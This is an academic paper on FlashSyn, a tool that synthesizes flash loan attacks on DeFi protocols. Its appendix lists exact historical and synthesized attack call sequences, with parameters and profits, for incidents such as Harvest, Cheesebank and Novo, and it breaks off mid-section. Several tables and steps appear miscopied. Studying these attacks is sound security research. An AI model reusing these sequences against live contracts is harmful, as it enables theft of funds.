FlashSyn: Flash Loan Attack Synthesis via Counter Example Driven Approximation

In decentralized finance (DeFi), lenders can offer flash loans to borrowers, i.e., loans that are only valid within a blockchain transaction and must be repaid with fees by the end of that transaction. Unlike normal loans, flash loans allow borrowers to borrow large assets without upfront collaterals deposits. Malicious adversaries use flash loans to gather large assets to exploit vulnerable DeFi protocols. In this paper, we introduce a new framework for automated synthesis of adversarial transactions that exploit DeFi protocols using flash loans. To bypass the complexity of a DeFi protocol, we propose a new technique to approximate the DeFi protocol functional behaviors using numerical methods (polynomial linear regression and nearest-neighbor interpolation). We then construct an optimization query using the approximated functions of the DeFi protocol to find an adversarial attack constituted of a sequence of functions invocations with optimal parameters that gives the maximum profit. To improve the accuracy of the approximation, we propose a novel counterexample driven approximation refinement technique. We implement our framework in a tool named FlashSyn. We evaluate FlashSyn on 16 DeFi protocols that were victims to flash loan attacks and 2 DeFi protocols from Damn Vulnerable DeFi challenges. FlashSyn automatically synthesizes an adversarial attack for 16 of the 18 benchmarks. Among the 16 successful cases, FlashSyn identifies attack vectors yielding higher profits than those employed by historical hackers in 3 cases, and also discovers multiple distinct attack vectors in 10 cases, demonstrating its effectiveness in finding possible flash loan attacks.

==> tex/benchmarks/ApeRocket.tex <==
\subsubsection{ApeRocket[\href{https://www.bscscan.com/tx/0x701a308fba23f9b328d2cdb6c7b245f6c3063a510e0d5bc21d2477c9084f93e0}{Transaction}] [\href{https://inspexco.medium.com/aperocket-finance-incident-analysis-improper-reward-minting-52153a8958fa}{Post Mortem}]}


On July 14, 2021, ApeRocket Finance was hacked due to an issue in the reward minting process. The hacker attacked the AutoCake contract just 10 hours after its deployment. The same attack vector was executed twice, causing a total of 883 BNB financial loss. 


\begin{table}[H]
\caption{Key Actions of ApeRocket Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
ApeRocket & deposit & CAKE & Share, Principle \\ \hline
CAKE & transfer & CAKE & / \\ \hline
ApeRocket & harvest & / & / \\ \hline
ApeRocket & getReward & Share, Principle & CAKE, SPACE \\ \hline
ApeRocket & withdrawAll & Share, Principle & CAKE, SPACE \\ \hline
ApeSwap & swapExactTokensForTokens & Space & WBNB \\ \hline
\end{tabular}
\end{table}




\noindent \textbf{Attack Root Cause:}
The core of ApeRocket attack is a design flaw of calculating the harvested reward. \codeword{harvest} will regard the current CAKE balance of ApeRocket AutoCake contract as rewards. However, the attacker can manipulate the calculated rewards by manually transfer CAKE to AutoCake contract. The manipulated rewards will be paid to the attacker in SPACE when \codeword{getReward} is executed. In this way, excessive SPACE will be minted. 


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{deposit(509143 * 1e18)} 
\\ 
Action 2: \codeword{CAKE.transfer(address(AutoCake), 1105857 * 1e18)} 
\\
Action 3: \codeword{harvest()} 
\\
Action 4: \codeword{getReward()} 
\\
Action 5: \codeword{withdrawAll()} 
\\
Action 6: \codeword{swapExactTokensForTokens(503997 * 1e18)} 
\\
Adjusted profit: 1345

First the exploiter called \codeword{deposit} 509143 CAKE to AutoCake contract to get the share. Then the exploiter manually transferred 1105857 CAKE to AutoCake contract as the reward, which resulted \codeword{getReward()} to mint excessive SPACE as the rewards to the exploiter. Next the exploiter called \codeword{withdrawAll} to withdraw CAKE and some small SPACE reward. Finally, the exploiter swapped SPACE to WBNB to get the profit.



\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{deposit(246484 * 1e18)} 
\\ 
Action 2: \codeword{CAKE.transfer(address(AutoCake), 391211 * 1e18)} 
\\
Action 3: \codeword{harvest()} 
\\
Action 2: \codeword{CAKE.transfer(address(AutoCake), 977148 * 1e18)} 
\\
Action 5: \codeword{withdrawAll()} 
\\
Action 6: \codeword{swapExactTokensForTokens(620312 * 1e18)} 
\\
Adjusted profit: 1258

\noindent \textbf{Datapoints Statistics:}




\begin{table}[H]
\caption{ApeRocket State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
CAKE & CAKE.balanceOf(AutoCakeAddress) & AutoCake CakeBalance \\ \hline
ApeRocket & MasterChef.userInfo(0, address(AutoCake)) & AutoCake Staked \\ \hline
ApeRocket & AutoCake.totalShares() & Total Shares of AutoCake \\ \hline
ApeSwap & ApePair.getReserves(){[}0{]} & \multicolumn{1}{c|}{ApePair WBNB reserve} \\ \hline
ApeSwap & ApePair.getReserves(){[}1{]} & ApePair Space reserve \\ \hline
\end{tabular}
\end{table}





\begin{table}[H]
\caption{Number of Data Points for ApeRocket Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
deposit & 5918 & 6027 & 6071 \\ \hline
getReward & 11775 & 12036 & 12072 \\ \hline
withdrawAll & 10764 & 10865 & 11148 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/Cheesebank.tex <==
\subsubsection{Cheesebank[\href{https://etherscan.io/tx/0x600a869aa3a259158310a233b815ff67ca41eab8961a49918c2031297a02f1cc}{Transaction}][\href{https://peckshield.medium.com/cheese-bank-incident-root-cause-analysis-d076bf87a1e7}{Post Mortem}]}

On November 6th, 2020, a flash loan attack drained about \$3.3 million of USDC/USDT/DAI from Cheesebank contracts by exploiting a design flaw of measuring asset price from an AMM-based oracle. 



\begin{table}[H]
\caption{Key Actions of CheeseBank Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Uniswap & mint & ETH & LP \\ \hline
Uniswap & swap & ETH & Cheese \\ \hline
CheeseBank & refresh & / & / \\ \hline
CheeseBank & CheeseETH.mint(-) & LP & LQ \\ \hline
CheeseBank & CheeseUSDC.borrow(-) & LQ & USDC \\ \hline
CheeseBank & CheeseUSDT.borrow(-) & LQ & USDT \\ \hline
CheeseBank & CheeseDAI.borrow(-) & LQ & DAI \\ \hline
Uniswap & swap & Cheese & ETH \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The root cause of CheeseBank attack is due to a flawed approach to measure the price of collaterals based on the AMM-based oracle Uniswap. Cheesebank contract only queries the instant states of Uniswap to calculate collateral prices. Thus, with a flashloan-based manipulation of collateral price on Uniswap, the exploitation manages to make a series of malicious borrow operations, leading to \$3.3 million of USDC/USDT/DAI loss




\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{mint(50e18)}
\\ 
Action 2: \codeword{swapETH2Cheese(20000e18)}
\\
Action 3: \codeword{refresh()}
\\ 
Action 4: \codeword{CheeseETH.mint(2833e18)}
\\
Action 4: \codeword{CheeseUSDC.borrow(2068252e6)}
\\
Action 5: \codeword{CheeseUSDT.borrow(1237995e6)}
\\
Action 6: \codeword{CheeseDAI.borrow(87586e18)}
\\
Action 7: \codeword{swapCheese2ETH(288822e18)}
\\

With an ETH flash loan, the exploiter first mints UNI\_V2 LP tokens. Then the exploiter raises the Cheese token price by swapping 20k WETH to 288k Cheese. This is the crucial step in this incident since the Cheese Bank uses the amount of WETH in a liquidity pool to estimate the price of the corresponding LP token. Then the exploiter calls \codeword{refresh} to update the price of LP token, and collateralize LP tokens(Action 4) to get falsely large borrow allowance, which allows the bad actor to drain all the USDC, USDT, and DAI withheld by Cheese Bank by three \codeword{borrow()} calls.




\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{mint(83e18)}
\\ 
Action 2: \codeword{swapETH2Cheese(11209e18)}
\\
Action 3: \codeword{mint(16e18)}
\\
Action 4: \codeword{refresh()}
\\ 
Action 5: \codeword{CheeseETH.mint(4002e18)}
\\
Action 6: \codeword{CheeseUSDC.borrow(1895288e6)}
\\
Action 7: \codeword{swapCheese2ETH(245907e18)}
\\


\textbf{Data Points Statistics}


\begin{table}[H]
\caption{CheeseBank State Reading Functions}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & State Reading Function & Note & End(Interpolation) \\ \hline
Uniswap & getReserves(){[}0{]} & Uniswap Pair's Cheese reserve & 1127 \\ \hline
Uniswap & getReserves(){[}1{]} & Uniswap Pair's WETH reserve & 267 \\ \hline
Uniswap & totalSupply() & Uniswap Pair's LP total supply & 31 \\ \hline
\end{tabular}
\end{table}




\begin{table}[H]
\caption{Number of Data Points for CheeseBank Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
refresh & 1084 & 1255 & 1127 \\ \hline
mint & 248 & 497 & 267 \\ \hline
CheeseDAI.borrow(-) & 14 & 350 & 31 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/ElevenFi.tex <==
\subsubsection{ElevenFi[\href{https://bscscan.com/tx/0x16c87d9c4eb3bc6c4e5fbba789f72e8bbfc81b3403089294a81f31b91088fc2f}{Transaction}][\href{https://inspexco.medium.com/improper-withdrawal-logic-on-emergencyburn-function-d1e27b10deca}{Post Mortem}]}
On June 22nd, 2021, a series of flash loan attacks from two attackers were perpetrated on the Eleven Finance's NeverSellVaults. 



\begin{table}[H]
\caption{Key Actions of ElevenFi Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Eleven.Fi & addLiquidity(-, 0, uint(-1)) & BUSD & nrvFUSDT \\ \hline
Eleven.Fi & deposit(-) & nrvFUSDT & 11nrvFUSDT \\ \hline
Eleven.Fi & emergencyBurn() & 11nrvFUSDT & nrvFUSDT \\ \hline
Eleven.Fi & withdraw(-) & 11nrvFUSDT & nrvFUSDT \\ \hline
Eleven.Fi & removeLiquidityOneToken(-, 1, 0, uint(-1)) & nrvFUSDT & BUSD \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The root cause of the attack is a logic error inside the \codeword{emergencyBurn}. When the \codeword{emergencyBurn} is called, the staked token nrvFUSDT is sent out but the share token 11nrvFUSDT is not burned. As a result, after calling \codeword{emergencyBurn}, the attacker is able to call \codeword{withdraw} to withdraw the staked token nrvFUSDT a second time, which later can be converted into BUSD via \codeword{deposit}.


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{addLiquidity(130001e18, 0, uint(-1))}
\\ 
Action 2: \codeword{deposit(130947e18)}
\\
Action 3: \codeword{emergencyBurn()}
\\ 
Action 4: \codeword{withdraw(130947e18)}
\\
Action 5: \codeword{removeLiquidityOneToken(261894e18, 1, 0, uint(-1))}
\\ 
The exploiter first provides BUSD liquidities to Eleven Finance protocol, and get issued the staked token nrvFUSDT. Next it calls \codeword{deposit} to deposit nrvFUSDT into  ElevenNeverSellVault contract of Eleven Finance, and get issued the share token 11nrvFUSDT. Then it calls \codeword{emergencyBurn} to get back its nrvFUSDT fund without burning the share token 11nrvFUSDT. Finally, it calls \codeword{withdraw} to burn 11nrvFUSDT and withdraw nrvFUSDT from ElevenNeverSellVault. In this way, it gets more staked token nrvFUSDT than what it deserves. Finally, it calls \codeword{removeLiquidityOneToken} to remove the liquidity of nrvFUSDT from ElevenNeverSellVault and get BUSD.  








\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{addLiquidity(140000e18, 0, uint(-1))}
\\ 
Action 2: \codeword{deposit(140000e18)}
\\
Action 3: \codeword{emergencyBurn()}
\\ 
Action 4: \codeword{withdraw(140000e18)}
\\
Action 5: \codeword{removeLiquidityOneToken(280000e18, 1, 0, uint(-1))}
\\ 
{\name} finds the exact same symbolic attack vector as the real attack vector in history, with only a small difference in the parameters. 

\textbf{Data Points Statistics}


\begin{table}[H]
\caption{ElevenFi State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
BUSD & BUSD.balanceOf(SwapAddress) & Eleven.Fi's BUSD balance \\ \hline
Eleven.Fi & nrvFUSDT.totalSupply() & Total supply of nrvFUSDT \\ \hline
\end{tabular}
\end{table}





\begin{table}[H]
\caption{Number of Data Points for ElevenFi Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Action & Start & End(Polynomial) & End(Interpolation) \\ \hline
addLiquidity(-, 0, uint(-1)) & 2066 & 2189 & 2073 \\ \hline
deposit(-) & / & / & / \\ \hline
emergencyBurn() & / & / & / \\ \hline
withdraw(-) & / & / & / \\ \hline
removeLiquidityOneToken(-, 1, 0, uint(-1)) & 681 & 923 & 701 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/Eminence.tex <==
\subsubsection{Eminence[\href{https://etherscan.io/tx/0x3503253131644dd9f52802d071de74e456570374d586ddd640159cf6fb9b8ad8}{Transaction}] [\href{https://sampriestley.com/defi-arbs-explained-15m-eminence-attack/}{Post Mortem}]}


On Sept 29, 2020, an attacker found a design flaw inside the newly deployed Eminence system, which allowed a flash loan attack and cause a financial loss of about 15 million USD.  


\begin{table}[H]
\caption{Key Actions of Eminence Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Eminence & buy(-) & DAI & EMN \\ \hline
eAAVE & buy(-) & EMN & eAAVE \\ \hline
Eminence & sell(-) & EMN & DAI \\ \hline
eAAVE & sell(-) & eAAVE & EMN \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The root cause of Eminence attack is a logic bug during the interactions of Eminence and eAAVE contracts. Eminence contract has DAI as reserves and EMN tokens as shares. eAAVE contract has EMN tokens as reserves and eAAVE tokens as shares. However, when you mint eAAVE you burn EMN without removing DAI, which falsely increase the price of EMN. 



\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{Eminence.buy(15000000e18)} 
\\ 
Action 2: \codeword{eAAVE.buy(691825807e18)} 
\\
Action 3: \codeword{Eminence.sell(691825807e18)} 
\\ 
Action 4: \codeword{eAAVE.sell(572431e18)} 
\\
Action 5: \codeword{Eminence.sell(691825227e18)} 
\\ 

Adjusted profit: 1674278 DAI

First the exploiter \codeword{buy} EMN tokens with 15M DAI. Then the exploiter \codeword{buy} eAAVE tokens with 691825807 EMN, which is close to half of EMN got from Action 1. At this time, EMN tokens are burned so the price of EMN is falsely high. Then the attacker \codeword{sell} the remaining 691825807 EMN to get excessive DAI. Finally, the attacker \codeword{sell} eAAVE to get EMN and \codeword{sell} EMN to get DAI.



\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{Eminence.buy(17355204e18)} 
\\ 
Action 2: \codeword{eAAVE.buy(787036921e18)} 
\\
Action 3: \codeword{Eminence.sell(787036921e18)} 
\\ 
Action 4: \codeword{eAAVE.sell(590277e18)} 
\\
Action 5: \codeword{Eminence.sell(787036921e18)} 
\\ 

Adjusted profit: 1757458 DAI


\noindent \textbf{Datapoints Statistics:}


\begin{table}[H]
\caption{Eminence State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Eminence & totalSupply() & Eminence total supply \\ \hline
Eminence & reserveBalance() & Eminence reserve \\ \hline
eAAVE & totalSupply() & eAAVE total supply \\ \hline
eAAVE & reserveBalance() & eAAVE reserve \\ \hline
\end{tabular}
\end{table}



\begin{table}[H]
\caption{Number of Data Points for Eminence Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
deposit & 5918 & 6027 & 6071 \\ \hline
getReward & 11775 & 12036 & 12072 \\ \hline
withdrawAll & 10764 & 10865 & 11148 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/Harvest_USDC.tex <==
\subsubsection{Harvest\_USDC[\href{https://etherscan.io/tx/0x35f8d2f572fceaac9288e5d462117850ef2694786992a8c3f6d02612277b0877}{Transaction}][\href{https://medium.com/haechi-audit/harvest-finance-economic-attack-deep-dive-part-1-420bc5d5ac0c}{Post Mortem}]}


Details are shown in Section ~\ref{sec:example}


==> tex/benchmarks/Harvest_USDT.tex <==
\subsubsection{Harvest\_USDT[\href{https://etherscan.io/tx/0x0fc6d2ca064fc841bc9b1c1fad1fbb97bcea5c9a1b2b66ef837f1227e06519a6}{Transaction}][\href{https://medium.com/harvest-finance/harvest-flashloan-economic-attack-post-mortem-3cf900d65217}{Post Mortem}]}

On October 26th, 2020, right after Harvest\_USDC attack, the same exploiter performs a similar attack vector on USDT vault of Harvest.Fi. It repeatedly performs the same attack vector in 13 transactions. Harvest\_USDT attack and Harvest\_USDC attack caused a financial loss of about 34 million USD. 


\begin{table}[H]
\caption{Key Actions of Harvest\_USDT Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Curve.Fi & exchange\_underlying(1, 2, -, 0) & USDC & USDT \\ \hline
Curve.Fi & exchange\_underlying(2, 1, -, 0) & USDT & USDC \\ \hline
Harvest.Fi & deposit(-) & USDC & fUSDC \\ \hline
Harvest.Fi & withdraw(-) & fUSDC & USDC \\ \hline
\end{tabular}
\end{table}




\noindent \textbf{Attack Root Cause:}
When a user deposits into or withdraw from Harvest vaults, the investment strategies of Harvest calculate the real-time value of assets invested in the underlying real-time protocols. The vaults use the calculation results to decide the shares to be issued to the user or the payout a user should receive. However, the assets of the vaults are deposited in shared public pools(such as Y Pool on Curve.Fi), which are subject to market effects like slippage. Thus, the real-time value of assets invested can be manipulated via market trades with a large volume, leaving a large arbitrage space. 
 

\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{exchange_underlying(2, 1, 17222012e6, 0)} 
\\ 
Action 2: \codeword{deposit(49977468e6)} 
\\
Action 3: \codeword{exchange_underlying(1, 2, 17239234e6, 0)} 
\\ 
Action 4: \codeword{withdraw(51456280e6)} 
\\ 
The exploiter first swaps a large amount of USDT to USDC via Y Pool on Curve.Fi, which pumps up the price of USDC(Action 1). As a consequence, Harvest's investment strategy calculates real-time value of its assets invested, which is abnormally high. This leads to more shares being issued to the exploiter when it deposits into the vault(Action 2). Then the exploiter swaps a large amount of USDC to USDT via Y Pool, which makes USDC/USDT price back to normal(Action 3). As a result, the real-time value of Harvest assets invested comes back to normal. This also rebalance Y pool and eliminate the exploiter's impermanent loss in Action 1. 





\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{exchange_underlying(2, 1, 12246094e6, 0)} 
\\ 
Action 2: \codeword{deposit(22705078e6)} 
\\
Action 3: \codeword{exchange_underlying(1, 2, 18808593e6, 0)} 
\\ 
Action 4: \codeword{withdraw(23144531e6)} 
\\ 
{\name} finds the exact same symbolic attack vector as the real attack vector. But the synthesized attack vector uses smaller parameters for Action 2 and Action 4, which reduces the profit. Besides, the synthesized result swaps much more USDC in Action 3 than the USDT in Action 1, which keeps the imbalance of Y Pool and caused the impermanent loss to the exploiter. The adjusted profit of the above attack vector is 125843 USD. 

\noindent \textbf{Datapoints Statistics:}



\begin{table}[H]
\caption{Harvest\_USDT State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Curve.Fi & CURVE\_yPool.balances(1) & Curve Y Pool USDC balance \\ \hline
Curve.Fi & CURVE\_yPool.balances(2) & Curve Y Pool USDT balance \\ \hline
Harvest.Fi & fUSDC.underlyingBalanceInVault() & fUSDC underlying balance \\ \hline
Harvest.Fi & Strategy.investedUnderlyingBalance() & invested underlying balance \\ \hline
Harvest.Fi & fUSDC.totalSupply() & fUSDC total supply \\ \hline
\end{tabular}
\end{table}







\begin{table}[H]
\caption{Number of Data Points for Harvest\_USDT Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Action & Start & End(Polynomial) & End(Interpolation) \\ \hline
exchange\_underlying(1, 2, -, 0) & 7852 & 8349 & 8305 \\ \hline
exchange\_underlying(2, 1, -, 0) & 8369 & 8874 & 8819 \\ \hline
deposit(-) & 7453 & 7710 & 7509 \\ \hline
withdraw(-) & 4496 & 5181 & 4683 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/Novo.tex <==
\subsubsection{Novo[\href{https://bscscan.com/tx/0x4f2005e3815c15d1a9abd8588dd1464769a00414a6b7adcbfd75a5331d378e1d}{Transaction}] [\href{https://twitter.com/novodefi/status/1531712425870905350}{Post Mortem}]}


On May 29, 2022, Novo protocol on Binance Smart Chain experienced a flash loan attack that drained liquidity from the liquidity pool and caused 278 BNB ~\$83K in damage.



\begin{table}[H]
\caption{Key Actions of Novo Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Pancake & swapExactTokensForTokensSupportingFeeOnTransferTokens1 & WBNB & Novo \\ \hline
Novo & transferFrom & / & / \\ \hline
Pancake & sync & / & / \\ \hline
Pancake & swapExactTokensForTokensSupportingFeeOnTransferTokens2 & Novo & WBNB \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The core of Novo attack is an implementation mistake inside \codeword{transferFrom}. The approval checks inside \codeword{transferFrom} are commented out, which means anybody can transfer any amount of Novo from any address. The attacker removed Novo from NovoWBNB Pancake Pair thus pumped the price of Novo. Then the attacker swap a small amount of Novo to almost all WBNB in NovoWBNB pair. 


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens1(1720 * 1e16)} 
\\ 
Action 2: \codeword{transferFrom(address(pair), address(0), 113951614 * 1e9)} 
\\
Action 3: \codeword{sync()} 
\\ 
Action 4: \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens2(4749070 * 1e9)} 
\\

Adjusted profit: 24857 WBNB

First the exploiter called \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens} to swap WBNB for some Novo tokens. Then the attacker executed \codeword{transferFrom} to remove most of Novo from NovoWBNB Pancake pair and executed \codeword{sync} to update the reserves of NovoWBNB Pancake pair. Finally the exploiter called \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens} to swap Novo for almost all WBNB in NovoWBNB pair.  



\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens1(1124 * 1e16)} 
\\ 
Action 2: \codeword{transferFrom(address(pair), address(0), 116514550 * 1e9)} 
\\
Action 3: \codeword{sync()} 
\\ 
Action 4: \codeword{swapExactTokensForTokensSupportingFeeOnTransferTokens2(2284484 * 1e9)} 
\\
Adjusted profit: 16401 WBNB 



\noindent \textbf{Datapoints Statistics:}

\begin{table}[H]
\caption{Novo State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Pancake & NovoWBNBPair.getReserves()[0] & PancakeSwap Pair's Novo Reserve \\ \hline
Pancake & NovoWBNBPair.getReserves()[1] & PancakeSwap Pair's WBNB Reserve \\ \hline
Pancake & Wdoge.balanceOf(address(NovoWBNBPair)) & PancakeSwap Pair's Novo Balance \\ \hline
Pancake & WBNB.balanceOf(address(NovoWBNBPair)) & PancakeSwap Pair's WBNB Balance \\ \hline
\end{tabular}
\end{table}


\begin{table}[H]
\caption{Number of Data Points for Novo Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
swapExactTokensForTokensSupportingFeeOnTransferTokens1 & 2859 & 2890 & 2867 \\ \hline
swapExactTokensForTokensSupportingFeeOnTransferTokens2 & 1818 & 1916 & 1834 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/OneRing.tex <==
\subsubsection{OneRing[\href{https://ftmscan.com/tx/0xca8dd33850e29cf138c8382e17a19e77d7331b57c7a8451648788bbb26a70145}{Transaction}] [\href{https://medium.com/oneringfinance/onering-finance-exploit-post-mortem-after-oshare-hack-602a529db99b}{Post Mortem}]}


On March 21st, 2022, OneRing Finance on Fantom blockchain was attacked by a flashloan attack. Assets worth about 2 million USD was stolen according to the official \href{https://medium.com/oneringfinance/onering-finance-exploit-post-mortem-after-oshare-hack-602a529db99b}{post mortem}.  


\begin{table}[H]
\caption{Key Actions of OneRing Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
OneRing & depositSafe(-, address(USDC)) & USDC & OShare \\ \hline
OneRing & withdraw( -, address(USDC)) & OShare & USDC \\ \hline
\end{tabular}
\end{table}

    

\noindent \textbf{Attack Root Cause:}
The hack was possible because a design flaw of calculating the price of LP tokens(OShare). Right after contract depolyment, the exploiter borrowed and called \codeword{depositSafe} to deposit \$80 million USDC to increase the price of OShare. Then the attacker called \codeword{withdraw} to burn OShare and drain the USDC reserve of the contract. 

\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{depositSafe(80000000e6, address(USDC))} 
\\ 
Action 2: \codeword{withdraw(41965511e18, address(USDC))} 
\\
Adjusted profit: 1534752 USDC



\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{depositSafe(101586914e6, address(USDC))} 
\\ 
Action 2: \codeword{withdraw(51780430e18, address(USDC))} 
\\
Adjusted profit: 1838593 USDC



\noindent \textbf{Datapoints Statistics:}



\begin{table}[H]
\caption{OneRing State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
OneRing & balanceWithInvested() & OneRing's total balance \\ \hline
OneRing & totalSupply() & OShare total supply \\ \hline
\end{tabular}
\end{table}






\begin{table}[H]
\caption{Number of Data Points for OneRing Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
depositSafe & 4534 & 4654 & 4683 \\ \hline
withdraw & 1529 & 1652 & 1687 \\ \hline
\end{tabular}
\end{table}


==> tex/benchmarks/Puppet.tex <==
\subsubsection{Puppet[\href{https://www.damnvulnerabledefi.xyz/challenges/8.html}{Problem}][\href{https://medium.com/@balag3/damn-vulnerable-defi-walkthrough-part-two-challenge-7-12-a64c42c82c5b}{Sample Solution}]}

In this challenge, there is a huge lending pool of Damn Valuable Tokens(DVT), where users are required to collateralize twice the borrow amount in ETH. The lending pool initially has 100000 DVT in liquidity. There is also a DVT uniswap v1 exchange, initially with 10 ETH and 10 DVT in liquidity. Beginning with 25 ETH and 1000 DVT, our goal is to steal tokens from the lending pool. 

\begin{table}[H]
    \caption{Key Actions of Puppet Attack}
    \begin{tabular}{|l|l|l|l|}
    \hline
    Protocol & Function & Token In & Token Out \\ \hline
    Uniswap & tokenToEthSwapInput(-, 1, 0xffffffff) & DVT & ETH \\ \hline
    Puppet & borrow(-) & ETH & DVT \\ \hline
    \end{tabular}
    \end{table}

\noindent \textbf{Attack Root Cause:}
Since the lending refers to an uniswap v1 exchange as its oracle, if there are much more DVT than ETH in the uniswap exchange, then we only need a small amount of ETH to borrow the entire amount of DVT from the lending pool. It is a typical oracle manipulation attack. 



\noindent \textbf{Attack Vector given by community:}
\\
Action 1: \codeword{tokenToEthSwapInput(1000e18, 1, 0xffffffff)}
\\ 
Action 2: \codeword{borrow(100000e18)}
\\
The exploiter first converts all its DVT(1000 DVT) to ETH, making the uniswap exchange has 1010 DVT and less than 1 ETH. Because of the manipulated liquidities inside the uniswap exchange, the exploiter is able to borrow 100000 DVT from the lending pool using a small amount of ETH. If we assume 1 ETH = 1000 DVT, then the adjusted profit is 93000 DVT.

\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{borrow(1e18, 1, 0xffffffff)}
\\ 
Action 2: \codeword{tokenToEthSwapInput(784e18, 1, 0xffffffff)}
\\
Action 3: \codeword{borrow(99999e18, 1, 0xffffffff)}
\\ 
Action 4: \codeword{tokenToEthSwapInput(1e18, 1, 0xffffffff)}
\\
Compared with the attach vector given by the community, our synthesized attack vector exchanges fewer DVT tokens to ETH(Action 2), and also borrows all DVT from the lending pool. Because of the token prices we assume, exchanging all DVT is no longer the best choice. There is a tradeoff between swapping more DVT to ETH in the uniswap exchange and spending more ETH to borrow all DVT from the lending pool. {\name} has chosen to swap 784 DVT to ETH. The adjusted profit is 107215 DVT.

\noindent \textbf{Data Points Statistics:}


\begin{table}[H]
\caption{Puppet State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Uniswap & dvt.balanceOf(address(uniswapExchange)) & Uniswap DVT liquidity \\ \hline
Uniswap & address(uniswapExchange).balance & Uniswap ETH liquidity \\ \hline
Puppet & dvt.balanceOf(address(puppetPool)) & Puppet Pool DVT balance \\ \hline
\end{tabular}
\end{table}






\begin{table}[H]
\caption{Number of Data Points for Puppet Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Action & Start & End(Polynomial) & End(Interpolation) \\ \hline
tokenToEthSwapInput(-, 1, 0xffffffff) & 2456 & 2483 & 2464 \\ \hline
borrow(-) & 1096 & 1155 & 1104 \\ \hline
\end{tabular}
\end{table}


==> tex/benchmarks/PuppetV2.tex <==
\subsubsection{PuppetV2[\href{https://www.damnvulnerabledefi.xyz/challenges/9.html}{Problem}][\href{https://medium.com/@balag3/damn-vulnerable-defi-walkthrough-part-two-challenge-7-12-a64c42c82c5b}{Sample Solution}]}

Similar to Puppet challenge in the previous chapter, there is a lending pool of DVT, where users are required to collateralize three times the borrow amount in Wrapped ETH. There is an uniswap v2 pair, initially with 10 WETH and 100 DVT in liquidity. Beginning with 20 ETH and 10000 DVT, our goal is still to steal tokens from the lending pool. 


\begin{table}[H]
\caption{Key Actions of PuppetV2 Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function Name & Token In & Token Out \\ \hline
Uniswap & swapExactTokensForETH(-) & DVT & ETH \\ \hline
WETH & deposit(-) & ETH & WETH \\ \hline
Puppet & borrow(-) & WETH & DVT \\ \hline
\end{tabular}
\end{table}


\noindent \textbf{Attack Root Cause:}
Similar to Puppet challenge, the lending refers to an uniswap v2 pair as its oracle, if liquidities of DVT and WETH are manipulated, an exploiter can spend a small amount of WETH to borrow the entire amount of DVT from the lending pool. It is a typical oracle manipulation attack.


\noindent \textbf{Attack Vector given by community:}
\\
